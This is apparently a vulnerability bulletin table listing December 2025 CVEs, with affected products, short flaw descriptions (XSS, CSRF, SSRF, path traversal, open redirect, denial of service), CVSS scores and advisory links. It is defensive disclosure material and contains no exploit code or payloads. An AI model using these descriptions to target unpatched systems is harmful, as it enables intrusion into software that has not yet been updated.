| Adobe--Adobe Experience Manager | Adobe Experience Manager versions 6.5.23 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim's browser when they browse to the page containing the vulnerable field. | 2025-12-10 | 5.4 | CVE-2025-64801 | https://helpx.adobe.com/security/products/experience-manager/apsb25-115.html |
| Adobe--Adobe Experience Manager | Adobe Experience Manager versions 6.5.23 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim's browser when they browse to the page containing the vulnerable field. | 2025-12-10 | 5.4 | CVE-2025-64802 | https://helpx.adobe.com/security/products/experience-manager/apsb25-115.html |
| Adobe--Adobe Experience Manager | Adobe Experience Manager versions 6.5.23 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim's browser when they browse to the page containing the vulnerable field. | 2025-12-10 | 5.4 | CVE-2025-64803 | https://helpx.adobe.com/security/products/experience-manager/apsb25-115.html |
| Adobe--Adobe Experience Manager | Adobe Experience Manager versions 6.5.23 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim's browser when they browse to the page containing the vulnerable field. | 2025-12-10 | 5.4 | CVE-2025-64804 | https://helpx.adobe.com/security/products/experience-manager/apsb25-115.html |
| Adobe--Adobe Experience Manager | Adobe Experience Manager versions 6.5.23 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim's browser when they browse to the page containing the vulnerable field. | 2025-12-10 | 5.4 | CVE-2025-64808 | https://helpx.adobe.com/security/products/experience-manager/apsb25-115.html |
| Adobe--Adobe Experience Manager | Adobe Experience Manager versions 6.5.23 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim's browser when they browse to the page containing the vulnerable field. | 2025-12-10 | 5.4 | CVE-2025-64814 | https://helpx.adobe.com/security/products/experience-manager/apsb25-115.html |
| Adobe--Adobe Experience Manager | Adobe Experience Manager versions 6.5.23 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim's browser when they browse to the page containing the vulnerable field. | 2025-12-10 | 5.4 | CVE-2025-64817 | https://helpx.adobe.com/security/products/experience-manager/apsb25-115.html |
| Adobe--Adobe Experience Manager | Adobe Experience Manager versions 6.5.23 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim's browser when they browse to the page containing the vulnerable field. | 2025-12-10 | 5.4 | CVE-2025-64820 | https://helpx.adobe.com/security/products/experience-manager/apsb25-115.html |
| Adobe--Adobe Experience Manager | Adobe Experience Manager versions 6.5.23 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim's browser when they browse to the page containing the vulnerable field. | 2025-12-10 | 5.4 | CVE-2025-64821 | https://helpx.adobe.com/security/products/experience-manager/apsb25-115.html |
| Adobe--Adobe Experience Manager | Adobe Experience Manager versions 6.5.23 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim's browser when they browse to the page containing the vulnerable field. | 2025-12-10 | 5.4 | CVE-2025-64822 | https://helpx.adobe.com/security/products/experience-manager/apsb25-115.html |
| Adobe--Adobe Experience Manager | Adobe Experience Manager versions 6.5.23 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim's browser when they browse to the page containing the vulnerable field. | 2025-12-10 | 5.4 | CVE-2025-64823 | https://helpx.adobe.com/security/products/experience-manager/apsb25-115.html |
| Adobe--Adobe Experience Manager | Adobe Experience Manager versions 6.5.23 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim's browser when they browse to the page containing the vulnerable field. | 2025-12-10 | 5.4 | CVE-2025-64825 | https://helpx.adobe.com/security/products/experience-manager/apsb25-115.html |
| Adobe--Adobe Experience Manager | Adobe Experience Manager versions 6.5.23 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim's browser when they browse to the page containing the vulnerable field. | 2025-12-10 | 5.4 | CVE-2025-64826 | https://helpx.adobe.com/security/products/experience-manager/apsb25-115.html |
| Adobe--Adobe Experience Manager | Adobe Experience Manager versions 6.5.23 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim's browser when they browse to the page containing the vulnerable field. | 2025-12-10 | 5.4 | CVE-2025-64827 | https://helpx.adobe.com/security/products/experience-manager/apsb25-115.html |
| Adobe--Adobe Experience Manager | Adobe Experience Manager versions 6.5.23 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim's browser when they browse to the page containing the vulnerable field. | 2025-12-10 | 5.4 | CVE-2025-64829 | https://helpx.adobe.com/security/products/experience-manager/apsb25-115.html |
| Adobe--Adobe Experience Manager | Adobe Experience Manager versions 6.5.23 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim's browser when they browse to the page containing the vulnerable field. | 2025-12-10 | 5.4 | CVE-2025-64833 | https://helpx.adobe.com/security/products/experience-manager/apsb25-115.html |
| Adobe--Adobe Experience Manager | Adobe Experience Manager versions 6.5.23 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim's browser when they browse to the page containing the vulnerable field. | 2025-12-10 | 5.4 | CVE-2025-64839 | https://helpx.adobe.com/security/products/experience-manager/apsb25-115.html |
| Adobe--Adobe Experience Manager | Adobe Experience Manager versions 6.5.23 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim's browser when they browse to the page containing the vulnerable field. | 2025-12-10 | 5.4 | CVE-2025-64840 | https://helpx.adobe.com/security/products/experience-manager/apsb25-115.html |
| Adobe--Adobe Experience Manager | Adobe Experience Manager versions 6.5.23 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim's browser when they browse to the page containing the vulnerable field. | 2025-12-10 | 5.4 | CVE-2025-64841 | https://helpx.adobe.com/security/products/experience-manager/apsb25-115.html |
| Adobe--Adobe Experience Manager | Adobe Experience Manager versions 6.5.23 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim's browser when they browse to the page containing the vulnerable field. | 2025-12-10 | 5.4 | CVE-2025-64845 | https://helpx.adobe.com/security/products/experience-manager/apsb25-115.html |
| Adobe--Adobe Experience Manager | Adobe Experience Manager versions 6.5.23 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim's browser when they browse to the page containing the vulnerable field. | 2025-12-10 | 5.4 | CVE-2025-64847 | https://helpx.adobe.com/security/products/experience-manager/apsb25-115.html |
| Adobe--Adobe Experience Manager | Adobe Experience Manager versions 6.5.23 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim's browser when they browse to the page containing the vulnerable field. | 2025-12-10 | 5.4 | CVE-2025-64850 | https://helpx.adobe.com/security/products/experience-manager/apsb25-115.html |
| Adobe--Adobe Experience Manager | Adobe Experience Manager versions 6.5.23 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim's browser when they browse to the page containing the vulnerable field. | 2025-12-10 | 5.4 | CVE-2025-64852 | https://helpx.adobe.com/security/products/experience-manager/apsb25-115.html |
| Adobe--Adobe Experience Manager | Adobe Experience Manager versions 6.5.23 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim's browser when they browse to the page containing the vulnerable field. | 2025-12-10 | 5.4 | CVE-2025-64853 | https://helpx.adobe.com/security/products/experience-manager/apsb25-115.html |
| Adobe--Adobe Experience Manager | Adobe Experience Manager versions 6.5.23 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim's browser when they browse to the page containing the vulnerable field. | 2025-12-10 | 5.4 | CVE-2025-64857 | https://helpx.adobe.com/security/products/experience-manager/apsb25-115.html |
| Adobe--Adobe Experience Manager | Adobe Experience Manager versions 6.5.23 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim's browser when they browse to the page containing the vulnerable field. | 2025-12-10 | 5.4 | CVE-2025-64858 | https://helpx.adobe.com/security/products/experience-manager/apsb25-115.html |
| Adobe--Adobe Experience Manager | Adobe Experience Manager versions 6.5.23 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim's browser when they browse to the page containing the vulnerable field. | 2025-12-10 | 5.4 | CVE-2025-64861 | https://helpx.adobe.com/security/products/experience-manager/apsb25-115.html |
| Adobe--Adobe Experience Manager | Adobe Experience Manager versions 6.5.23 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim's browser when they browse to the page containing the vulnerable field. | 2025-12-10 | 5.4 | CVE-2025-64863 | https://helpx.adobe.com/security/products/experience-manager/apsb25-115.html |
| Adobe--Adobe Experience Manager | Adobe Experience Manager versions 6.5.23 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim's browser when they browse to the page containing the vulnerable field. | 2025-12-10 | 5.4 | CVE-2025-64869 | https://helpx.adobe.com/security/products/experience-manager/apsb25-115.html |
| Adobe--Adobe Experience Manager | Adobe Experience Manager versions 6.5.23 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim's browser when they browse to the page containing the vulnerable field. | 2025-12-10 | 5.4 | CVE-2025-64873 | https://helpx.adobe.com/security/products/experience-manager/apsb25-115.html |
| Adobe--Adobe Experience Manager | Adobe Experience Manager versions 6.5.23 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim's browser when they browse to the page containing the vulnerable field. | 2025-12-10 | 5.4 | CVE-2025-64875 | https://helpx.adobe.com/security/products/experience-manager/apsb25-115.html |
| Adobe--Adobe Experience Manager | Adobe Experience Manager versions 6.5.23 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim's browser when they browse to the page containing the vulnerable field. | 2025-12-10 | 5.4 | CVE-2025-64881 | https://helpx.adobe.com/security/products/experience-manager/apsb25-115.html |
| Adobe--Adobe Experience Manager | Adobe Experience Manager versions 6.5.23 and earlier are affected by a DOM-based Cross-Site Scripting (XSS) vulnerability that could be exploited by a low privileged attacker to execute malicious scripts in the context of the victim's browser. Exploitation of this issue requires user interaction, such as visiting a crafted URL or interacting with a manipulated web page. | 2025-12-10 | 5.4 | CVE-2025-64887 | https://helpx.adobe.com/security/products/experience-manager/apsb25-115.html |
| Adobe--Adobe Experience Manager | Adobe Experience Manager versions 6.5.23 and earlier are affected by a DOM-based Cross-Site Scripting (XSS) vulnerability that could be exploited by a low privileged attacker to execute malicious scripts in the context of the victim's browser. Exploitation of this issue requires user interaction, such as visiting a crafted URL or interacting with a manipulated web page. | 2025-12-10 | 5.4 | CVE-2025-64888 | https://helpx.adobe.com/security/products/experience-manager/apsb25-115.html |
| Adobe--DNG SDK | DNG SDK versions 1.7.0 and earlier are affected by an Integer Overflow or Wraparound vulnerability that could lead to application denial-of-service. An attacker could exploit this issue to cause the application to crash or become unresponsive. Exploitation of this issue requires user interaction in that a victim must open a malicious file. | 2025-12-09 | 5.5 | CVE-2025-64894 | https://helpx.adobe.com/security/products/dng-sdk/apsb25-118.html |
| Adobe--Creative Cloud Desktop | Creative Cloud Desktop versions 6.4.0.361 and earlier are affected by a Creation of Temporary File in Directory with Incorrect Permissions vulnerability that could lead to application denial-of-service. An attacker could exploit this vulnerability to disrupt the application's functionality by manipulating temporary files. Exploitation of this issue requires user interaction in that a victim must open a malicious file. | 2025-12-09 | 5.5 | CVE-2025-64896 | https://helpx.adobe.com/security/products/creative-cloud/apsb25-120.html |
| Adobe--ColdFusion | ColdFusion versions 2025.4, 2023.16, 2021.22 and earlier are affected by an Improper Access Control vulnerability. A low privileged attacker could leverage this vulnerability to bypass security measures and gain limited unauthorized write access potentially resulting in denial of service. Exploitation of this issue requires user interaction. | 2025-12-09 | 5.6 | CVE-2025-64897 | https://helpx.adobe.com/security/products/coldfusion/apsb25-105.html |
| libimobiledevice--usbmuxd | A Path Traversal vulnerability in usbmuxd allows local users to escalate to the service user. This issue affects usbmuxd: before 3ded00c9985a5108cfc7591a309f9a23d57a8cba. | 2025-12-10 | 5.7 | CVE-2025-66004 | https://bugzilla.suse.com/show_bug.cgi?id=CVE-2025-66004 |
| okta--okta-sdk-java | Okta Java Management SDK facilitates interactions with the Okta management API. In versions 21.0.0 through 24.0.0, specific multithreaded implementations may encounter memory issues as threads are not properly cleaned up after requests are completed. Over time, this can degrade performance and availability in long-running applications and may result in a denial-of-service condition under sustained load. In addition to using the affected versions, users may be at risk if they are implementing a long-running application using the ApiClient in a multi-threaded manner. This issue is fixed in version 24.0.1. | 2025-12-10 | 5.3 | CVE-2025-66033 | https://github.com/okta/okta-sdk-java/security/advisories/GHSA-qhr6-6cgv-6638 https://github.com/okta/okta-sdk-java/commit/1daa9229a70fc38fb252aeaa637f82d0b0729b3f |
| Huawei--HarmonyOS | Multi-thread race condition vulnerability in the camera framework module. Impact: Successful exploitation of this vulnerability may affect availability. | 2025-12-08 | 5.1 | CVE-2025-66320 | https://consumer.huawei.com/en/support/bulletin/2025/12/ |
| Huawei--HarmonyOS | Multi-thread race condition vulnerability in the camera framework module. Impact: Successful exploitation of this vulnerability may affect availability. | 2025-12-08 | 5.1 | CVE-2025-66321 | https://consumer.huawei.com/en/support/bulletin/2025/12/ |
| Huawei--HarmonyOS | Multi-thread race condition vulnerability in the camera framework module. Impact: Successful exploitation of this vulnerability may affect availability. | 2025-12-08 | 5.1 | CVE-2025-66322 | https://consumer.huawei.com/en/support/bulletin/2025/12/ |
| Huawei--HarmonyOS | Vulnerability of improper criterion security check in the card module. Impact: Successful exploitation of this vulnerability may affect availability. | 2025-12-08 | 5.3 | CVE-2025-66323 | https://consumer.huawei.com/en/support/bulletin/2025/12/ |
| traefik--traefik | Traefik is an HTTP reverse proxy and load balancer. Versions 3.5.0 through 3.6.2 have inverted TLS verification logic in the nginx.ingress.kubernetes.io/proxy-ssl-verify annotation. Setting the annotation to "on" (intending to enable backend TLS certificate verification) actually disables verification, allowing man-in-the-middle attacks against HTTPS backends when operators believe they are protected. This issue is fixed in version 3.6.3. | 2025-12-09 | 5.9 | CVE-2025-66491 | https://github.com/traefik/traefik/security/advisories/GHSA-7vww-mvcr-x6vj https://github.com/traefik/traefik/commit/14a1aedf5704673d875d210d7bacf103a43c77e4 https://github.com/traefik/traefik/releases/tag/v3.6.3 |
| Zoom Communications Inc.--Zoom Rooms | External control of file name or path in Zoom Rooms for macOS before version 6.6.0 may allow an authenticated user to conduct a disclosure of information via local access. | 2025-12-10 | 5 | CVE-2025-67461 | https://www.zoom.com/en/trust/security-bulletin/zsb-25051 |
| machphy--mad-proxy | mad-proxy is a Python-based HTTP/HTTPS proxy server for detection and blocking of malicious web activity using custom security policies. Versions 0.3 and below allow attackers to bypass HTTP/HTTPS traffic interception rules, potentially exposing sensitive traffic. This issue does not have a fix at the time of publication. | 2025-12-10 | 5.3 | CVE-2025-67485 | https://github.com/machphy/mad-proxy/security/advisories/GHSA-wx63-35hw-2482 |
| auth0--nextjs-auth0 | The Auth0 Next.js SDK is a library for implementing user authentication in Next.js applications. When using versions 4.11.0 through 4.11.2 and 4.12.0, simultaneous requests on the same client may result in improper lookups in the TokenRequestCache for the request results. This issue is fixed in versions 4.11.2 and 4.12.1. | 2025-12-10 | 5.4 | CVE-2025-67490 | https://github.com/auth0/nextjs-auth0/security/advisories/GHSA-wcgj-f865-c7j7 https://github.com/auth0/nextjs-auth0/commit/26cc8a7c60f4b134700912736f991a25bd6bbf0b |
| remram44--taguette | Taguette is an open source qualitative research tool. In versions 1.5.1 and below, attackers can craft malicious URLs that redirect users to arbitrary external websites after authentication. The application accepts a user-controlled next parameter and uses it directly in HTTP redirects without any validation. This can be exploited for phishing attacks where victims believe they are interacting with a trusted Taguette instance but are redirected to a malicious site designed to steal credentials or deliver malware. This issue is fixed in version 1.5.2. | 2025-12-09 | 5.4 | CVE-2025-67502 | https://github.com/remram44/taguette/security/advisories/GHSA-5923-r76v-mprm https://github.com/remram44/taguette/commit/67de2d2612e7e2572c61cd9627f89c2bfd0f2a36 |
| auth0--nextjs-auth0 | The Auth0 Next.js SDK is a library for implementing user authentication in Next.js applications. Versions 4.9.0 through 4.12.1 contain an input-validation flaw in the returnTo parameter, which could allow attackers to inject unintended OAuth query parameters into the Auth0 authorization request. Successful exploitation may result in tokens being issued with unintended parameters. This issue is fixed in version 4.13.0. | 2025-12-11 | 5.7 | CVE-2025-67716 | https://github.com/auth0/nextjs-auth0/security/advisories/GHSA-mr6f-h57v-rpj5 https://github.com/auth0/nextjs-auth0/commit/35eb321de3345ccf23e8c0d6f66c9f2f2f57d26c |
| tornadoweb--tornado | Tornado is a Python web framework and asynchronous networking library. In versions 6.5.2 and below, the supplied reason phrase is used unescaped in HTTP headers (where it could be used for header injection) or in HTML in the default error page (where it could be used for XSS) and can be exploited by passing untrusted or malicious data into the reason argument. Used by both RequestHandler.set_status and tornado.web.HTTPError, the argument is designed to allow applications to pass custom "reason" phrases (the "Not Found" in HTTP/1.1 404 Not Found) to the HTTP status line (mainly for non-standard status codes). This issue is fixed in version 6.5.3. | 2025-12-12 | 5.4 | CVE-2025-67724 | https://github.com/tornadoweb/tornado/security/advisories/GHSA-pr2v-jx2c-wg9f https://github.com/tornadoweb/tornado/commit/9c163aebeaad9e6e7d28bac1f33580eb00b0e421 https://github.com/tornadoweb/tornado/releases/tag/v6.5.3 |
| sequoia-pgp--sequoia | In Sequoia before 2.1.0, aes_key_unwrap panics if passed a ciphertext that is too short. A remote attacker can take advantage of this issue to crash an application by sending a victim an encrypted message with a crafted PKESK or SKESK packet. | 2025-12-14 | 5.3 | CVE-2025-67897 | https://gitlab.com/sequoia-pgp/sequoia/-/commit/b59886e5e7bdf7169ed330f309a6633d131776e5 https://bugs.debian.org/1122582 https://gitlab.com/sequoia-pgp/sequoia/-/blob/b59886e5e7bdf7169ed330f309a6633d131776e5/openpgp/NEWS#L7-L26 |
| kristapsdz--openrsync | openrsync through 0.5.0, as used in OpenBSD through 7.8 and on other platforms, allows a client to cause a server SIGSEGV by specifying a length of zero for block data, because the relationship between p->rem and p->len is not checked. | 2025-12-14 | 5.3 | CVE-2025-67901 | https://github.com/kristapsdz/openrsync/issues/34 https://github.com/openbsd/src/blob/60b9c3dff1abf933e85e3c4d96b54201ee947513/usr.bin/rsync/blocks.c#L480-L481 |
| TalentSoft Software--UNIS | Improper Neutralization of Input During Web Page Generation (XSS or 'Cross-site Scripting') vulnerability in TalentSoft Software UNIS allows Reflected XSS. This issue affects UNIS: before 42957. | 2025-12-09 | 5.4 | CVE-2025-6923 | https://www.usom.gov.tr/bildirim/tr-25-0435 |
| TalentSoft Software--e-BAP Automation | Improper Neutralization of Input During Web Page Generation (XSS or 'Cross-site Scripting') vulnerability in TalentSoft Software e-BAP Automation allows Reflected XSS. This issue affects e-BAP Automation: before 42957. | 2025-12-09 | 5.4 | CVE-2025-6924 | https://www.usom.gov.tr/bildirim/tr-25-0434 |
| templateinvaders--TI WooCommerce Wishlist | The TI WooCommerce Wishlist plugin for WordPress is vulnerable to HTML Injection in all versions up to, and including, 2.10.0. This is due to the plugin accepting hidden fields and not limiting the values or data that can be input and are later output. This makes it possible for unauthenticated attackers to inject arbitrary HTML into wishlist items. | 2025-12-13 | 5.3 | CVE-2025-9207 | https://www.wordfence.com/threat-intel/vulnerabilities/id/8d08d381-d0ef-4f40-975d-51e919a7c872?source=cve https://plugins.trac.wordpress.org/browser/ti-woocommerce-wishlist/trunk/includes/wishlist.class.php#L326 https://plugins.trac.wordpress.org/browser/ti-woocommerce-wishlist/trunk/includes/wishlist.class.php#L544 https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&old=3399224%40ti-woocommerce-wishlist&new=3399224%40ti-woocommerce-wishlist&sfp_email=&sfph_mail= |
| Repute Infosystems--ARMember | Missing Authorization vulnerability in Repute Infosystems ARMember allows Exploiting Incorrectly Configured Access Control Security Levels. This issue affects ARMember: from n/a through 3.4.10. | 2025-12-09 | 4.3 | CVE-2022-47425 | https://vdp.patchstack.com/database/wordpress/plugin/armember-membership/vulnerability/wordpress-armember-membership-plugin-content-restriction-member-levels-user-profile-user-signup-plugin-3-4-10-broken-access-control?_s_id=cve |
| Taylor Hawkes--WP Fast Cache | Cross-Site Request Forgery (CSRF) vulnerability in Taylor Hawkes WP Fast Cache allows Cross Site Request Forgery. This issue affects WP Fast Cache: from n/a through 1.5. | 2025-12-09 | 4.3 | CVE-2023-22675 | https://vdp.patchstack.com/database/wordpress/plugin/wp-fast-cache/vulnerability/wordpress-wp-fast-cache-plugin-1-5-cross-site-request-forgery-csrf-vulnerability?_s_id=cve |
| creativthemes--Mavix Education | The Mavix Education theme for WordPress is vulnerable to unauthorized modification of data due to a missing capability check on the 'mavix_education_activate_plugin' AJAX action in all versions up to, and including, 1.0. This makes it possible for authenticated attackers, with Subscriber-level access and above, to activate the Creativ Demo Importer plugin. | 2025-12-13 | 4.3 | CVE-2025-11164 | https://www.wordfence.com/threat-intel/vulnerabilities/id/a8e57528-010f-4ec6-917b-4cd8c3fdbd58?source=cve https://themes.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&old=297888%40mavix-education&new=297888%40mavix-education |
| GitLab--GitLab | GitLab has remediated an issue in GitLab EE affecting all versions from 13.2 before 18.4.6, 18.5 before 18.5.4, and 18.6 before 18.6.2 that could have allowed an authenticated user to disclose sensitive information from private projects by executing specifically crafted GraphQL queries. | 2025-12-11 | 4.3 | CVE-2025-11247 | GitLab Issue #573766 HackerOne Bug Bounty Report #3307422 https://about.gitlab.com/releases/2025/12/10/patch-release-gitlab-18-6-2-released/ |
| emplibot--Emplibot AI Content Writer with Keyword Research, Infographics, and Linking \| SEO Optimized \| Fully Automated | The Emplibot - AI Content Writer with Keyword Research, Infographics, and Linking \| SEO Optimized \| Fully Automated plugin for WordPress is vulnerable to Server-Side Request Forgery in all versions up to, and including, 1.0.9 via the emplibot_call_webhook_with_error() and emplibot_process_zip_data() functions. This makes it possible for authenticated attackers, with Administrator-level access and above, to make web requests to arbitrary locations originating from the web application and can be used to query and modify information from internal services. | 2025-12-13 | 4.4 | CVE-2025-11970 | https://www.wordfence.com/threat-intel/vulnerabilities/id/095c6359-112d-4abc-a69b-a623dfd103c0?source=cve https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&old=3398720%40emplibot&new=3398720%40emplibot&sfp_email=&sfph_mail= |
| netweblogic--Events Manager Calendar, Bookings, Tickets, and more! | The Events Manager - Calendar, Bookings, Tickets, and more! plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, 7.2.2.2. This is due to missing or incorrect nonce validation on the 'location_delete' action. This makes it possible for unauthenticated attackers to delete locations via a forged request granted they can trick a site administrator into performing an action such as clicking on a link. | 2025-12-12 | 4.3 | CVE-2025-12407 | https://www.wordfence.com/threat-intel/vulnerabilities/id/a99d0220-38af-40fe-8b9f-af173fc41248?source=cve https://plugins.trac.wordpress.org/changeset/3392395/events-manager/trunk/em-actions.php |
| edge22--GenerateBlocks | The GenerateBlocks plugin for WordPress is vulnerable to information exposure due to missing object-level authorization checks in versions up to, and including, 2.1.2. This is due to the plugin registering multiple REST API routes under `generateblocks/v1/meta/` that gate access with `current_user_can('edit_posts')`, which is granted to low-privileged roles such as Contributor. The handlers accept arbitrary entity IDs (user IDs, post IDs, etc.) and meta keys, returning any requested metadata with only a short blacklist of password-like keys for protection. There is no object-level authorization ensuring the caller is requesting only their own data, and there is no allowlist of safe keys. This makes it possible for authenticated attackers, with Contributor-level access and above, to exfiltrate personally identifiable information (PII) and other sensitive profile data of administrator accounts or any other users by directly querying user meta keys via the exposed endpoints via the `get_user_meta_rest` function. In typical WordPress + WooCommerce setups, this includes names, email, phone, and address fields that WooCommerce stores in user meta, enabling targeted phishing, account takeover pretexting, and privacy breaches. | 2025-12-13 | 4.3 | CVE-2025-12512 | https://www.wordfence.com/threat-intel/vulnerabilities/id/6affdb56-39cc-4749-b7cb-b80b7666f028?source=cve https://plugins.trac.wordpress.org/browser/generateblocks/tags/2.1.1/includes/class-meta-handler.php#L56 https://plugins.trac.wordpress.org/browser/generateblocks/tags/2.1.1/includes/class-meta-handler.php#L297 https://plugins.trac.wordpress.org/browser/generateblocks/tags/2.1.1/includes/class-meta-handler.php#L61 https://plugins.trac.wordpress.org/changeset/3415721/generateblocks/trunk/includes/class-meta-handler.php |
| beaverbuilder--Beaver Builder Page Builder Drag and Drop Website Builder | The Beaver Builder - WordPress Page Builder plugin for WordPress is vulnerable to Sensitive Information Exposure in all versions up to, and including, 2.9.4 via the 'get_attachment_sizes' function. This makes it possible for authenticated attackers, with Contributor-level access and above, to extract sensitive data including the path and meta data of private attachments, which can be used to view the attachments. | 2025-12-09 | 4.3 | CVE-2025-12558 | https://www.wordfence.com/threat-intel/vulnerabilities/id/eb2f6c67-ef4a-4afc-bd61-6c0185e354a8?source=cve https://plugins.trac.wordpress.org/browser/beaver-builder-lite-version/trunk/classes/class-fl-controls.php#L71 https://plugins.trac.wordpress.org/browser/beaver-builder-lite-version/trunk/classes/class-fl-controls.php#L216 https://plugins.trac.wordpress.org/changeset/3406987 |
| premmerce--Premmerce Brands for WooCommerce | The Premmerce Brands for WooCommerce plugin for WordPress is vulnerable to unauthorized modification of data due to a missing capability check on the saveBrandsSettings function in all versions up to, and including, 1.2.13. This makes it possible for authenticated attackers, with Subscriber-level access and above, to modify brand permalink settings. | 2025-12-12 | 4.3 | CVE-2025-12783 | https://www.wordfence.com/threat-intel/vulnerabilities/id/6560ba0b-2190-4d30-b0c4-f07d524ccfde?source=cve https://plugins.trac.wordpress.org/browser/premmerce-woocommerce-brands/tags/1.2.13/src/Admin/Admin.php#L101 |
| IBM--InfoSphere Information Server | IBM InfoSphere Information Server 11.7.0.0 through 11.7.1.6 is vulnerable to server-side request forgery (SSRF). This may allow an authenticated attacker to send unauthorized requests from the system, potentially leading to network enumeration or facilitating other attacks. | 2025-12-08 | 4.6 | CVE-2025-12832 | https://www.ibm.com/support/pages/node/7253507 |
| Im Park Information Technology, Electronics, Press, Publishing and Advertising, Education Ltd. Co.--DijiDemi | Authorization Bypass Through User-Controlled Key vulnerability in Im Park Information Technology, Electronics, Press, Publishing and Advertising, Education Ltd. Co. DijiDemi allows Exploitation of Trusted Identifiers. This issue affects DijiDemi: through 28.11.2025. | 2025-12-10 | 4.3 | CVE-2025-13125 | https://www.usom.gov.tr/bildirim/tr-25-0442 |
| imaqpress--IMAQ CORE | The IMAQ Core plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, 1.2.1. This is due to missing nonce validation on the URL structure settings update functionality. This makes it possible for unauthenticated attackers to update the plugin's URL structure settings via a forged request granted they can trick a site administrator into performing an action such as clicking on a link. | 2025-12-12 | 4.3 | CVE-2025-13363 | https://www.wordfence.com/threat-intel/vulnerabilities/id/684de9c5-6f94-455d-b095-9f2df733ab95?source=cve https://plugins.trac.wordpress.org/browser/imaq-core/trunk/libs/AcademixCorePermalink.php#L58 https://plugins.trac.wordpress.org/browser/imaq-core/tags/1.2.1/libs/AcademixCorePermalink.php#L58 |
